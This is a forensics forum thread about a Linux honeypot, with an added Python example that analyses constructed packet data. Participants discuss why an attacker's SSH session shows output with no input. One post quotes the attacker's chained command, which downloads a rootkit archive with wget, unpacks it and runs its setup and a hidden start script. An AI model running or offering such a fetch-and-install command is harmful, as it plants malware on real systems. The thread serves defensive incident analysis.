Need help analyzing SSH activity

(@audio)
Estimable Member
Joined: 19 years ago
Posts: 149
Topic starter  

I've created a chart to help analyze activity on a Linux honeypot where "Malicious File Access" is simply the atime of files in the attacker's hidden working directory… The activity around 192400 is when the attacker installed a rootkit and accessed some other malicious files.

My question is, what are the possible explanations as to why there isn't any inbound data during that time. I expected all outbound data would have corresponding inbound data, but that isn't the case in this instance. I double checked the pcap and confirmed there wasn't any inbound data during that time so I don't think it's a bug.


   
Quote
azrael
(@azrael)
Honorable Member
Joined: 19 years ago
Posts: 656
 

Quick question: how are you determining that outbound data originates from SSH? If it is on source/destination port, perhaps it is a portscanner looking for other SSH-enabled clients to attack, or a process looking to find a client on SSH and getting no responses (misconfigured dial-home?)?

Just an idea.

( P.S. Like the graph - we should have more of those on the forum 😉 )


   
ReplyQuote
(@audio)
Estimable Member
Joined: 19 years ago
Posts: 149
Topic starter  

Quick question: how are you determining that outbound data originates from SSH? If it is on source/destination port, perhaps it is a portscanner looking for other SSH-enabled clients to attack, or a process looking to find a client on SSH and getting no responses (misconfigured dial-home?)?

Just an idea.

( P.S. Like the graph - we should have more of those on the forum 😉 )

Thanks… The bars represent inbound/outbound SSH application bytes from a connection the attacker used to login to the honeypot after guessing the password. I just filtered out that session based on IPs and ports like you said.

Yeah, you can't tell from that chart alone, but the first red point is the attacker downloading his toolkit over HTTP. The first blue point is the port scanner that was run. The second red point is a port sweep for TCP port 10000, etc. I put that data in an HTML table after the chart is done to give those details.

I just can't figure out why there isn't inbound data at 192400. I don't yet have a lot of experience with this, but I'm sure there is an explanation.

Edit–

BTW, I'm not sure if it matters, but the third red point at 192400 was the rootkit that was downloaded. The actual wget command used to download it happened at 192050. The reason for the delay was that the second red point was a port scan, and the firewall that was throttling TCP connection requests wouldn't allow any more TCP connections for a while.


   
ReplyQuote
(@unknown)
Eminent Member
Joined: 17 years ago
Posts: 21
 

Do you see TCP based traffic at that time in your pcap? It isn't UDP per chance is it?


   
ReplyQuote
azrael
(@azrael)
Honorable Member
Joined: 19 years ago
Posts: 656
 

As this is a honeypot, is there any chance we could get hold of everything to work with?

Without that, I wonder if it might be caused by the use of netcat; conceivably, if it is pumping out preformed packets it could be spoofing the source IP, thus any return traffic would go somewhere else?


   
ReplyQuote
(@audio)
Estimable Member
Joined: 19 years ago
Posts: 149
Topic starter  

Hey guys,

After checking the pcap, it's definitely SSH and not spoofed IPs. The pcap filter used is below… I'm pretty sure that part is correct and, despite there being a lot of network activity in the chart, it's more of a host-based forensics question, which is my weak area. I'm not sure what the attacker could have done that would cause commands to be run with no apparent input sent at that time. I checked some of the scripts the attacker ran at 192008 to see if sleep was used, but that wasn't able to explain it.

The pcap filter:

(tcp and host $int_ip and host $ext_ip and tcp port $port) or (src host $int_ip and tcp[13] = 2)

Sorry, but I don't think I can give out the pcap. Some of it contains information used to login to compromised hosts. However, when my report is finally done, I would like for someone to give some feedback on it.


   
ReplyQuote
(@audio)
Estimable Member
Joined: 19 years ago
Posts: 149
Topic starter  

I may have just figured it out! I've thought about this some more; does anyone think this is a reasonable explanation? Since the wget command happened at 192050 and, because of SYN throttling by the firewall, the actual HTTP request to download the rootkit happened at 192400 and then the rootkit was immediately installed and malicious files accessed, maybe all of the commands were chained?

192050:

# wget domain.com/rootkit.tar.gz && tar -xzvf rootkit.tar.gz && cd ./rk && ./setup password && /root/.maldir/start

How do you guys try to explain anomalies like this in your report when you may never be sure if you're right or not?


   
ReplyQuote
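To check the poster's filter and the chained-command hypothesis together, the added example below (not part of the thread; all IPs, ports and packet records are constructed) applies the same BPF logic to packet records, bins SSH payload bytes per second by direction, and lists the seconds with output but no input, which is the pattern a single `&&` chain typed at 192050 would produce at 192400.

```python
# Added example, not from the thread: replays the poster's pcap filter over
# constructed packet records and finds "outbound SSH with no inbound" seconds.
from collections import defaultdict

INT_IP, EXT_IP, PORT = "10.0.0.5", "203.0.113.7", 22  # constructed values
SYN = 0x02  # tcp[13] = 2 is an exact compare: SYN set, nothing else (no SYN/ACK)

# (time HHMMSS, src, dst, sport, dport, tcp flags, SSH payload bytes); constructed
PACKETS = [
    (192008, EXT_IP, INT_IP, 51000, 22, 0x18, 64),           # attacker types a command
    (192008, INT_IP, EXT_IP, 22, 51000, 0x18, 1200),         # command output echoed back
    (192050, EXT_IP, INT_IP, 51000, 22, 0x18, 96),           # chained wget && ... line
    (192050, INT_IP, EXT_IP, 22, 51000, 0x18, 96),
    (192050, INT_IP, "198.51.100.9", 40000, 80, 0x02, 0),    # SYN to web host, throttled
    (192400, INT_IP, "198.51.100.9", 40001, 80, 0x02, 0),    # retried SYN gets through
    (192400, INT_IP, EXT_IP, 22, 51000, 0x18, 3000),         # tar/setup output, no new input
    (192401, INT_IP, EXT_IP, 22, 51000, 0x18, 2500),
    (192401, INT_IP, EXT_IP, 22, 51000, 0x18, 4000),
]

def matches_filter(pkt):
    """The thread's filter: the SSH session itself, or any pure SYN the honeypot sends."""
    _, src, dst, sport, dport, flags, _ = pkt
    session = {src, dst} == {INT_IP, EXT_IP} and PORT in (sport, dport)
    outbound_syn = src == INT_IP and flags == SYN
    return session or outbound_syn

def bin_ssh_bytes(packets):
    """Per-second {time: (inbound_bytes, outbound_bytes)} for SSH payload only."""
    bins = defaultdict(lambda: [0, 0])
    for pkt in filter(matches_filter, packets):
        t, src, _, sport, dport, _, size = pkt
        if PORT not in (sport, dport):
            continue  # outbound SYNs pass the filter but carry no SSH bytes
        bins[t][1 if src == INT_IP else 0] += size
    return {t: tuple(v) for t, v in sorted(bins.items())}

def outbound_only_windows(bins):
    """Seconds with SSH output but zero input: the gap the poster saw at 192400."""
    return [t for t, (inb, outb) in bins.items() if outb and not inb]

if __name__ == "__main__":
    for t in outbound_only_windows(bin_ssh_bytes(PACKETS)):
        print(f"{t}: outbound SSH bytes with no inbound input")
```

Against a real capture, the same binning over the filtered session shows whether the outbound-only seconds line up with the timestamps of a single earlier inbound burst, which is the evidence the chained-command explanation needs.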
Share: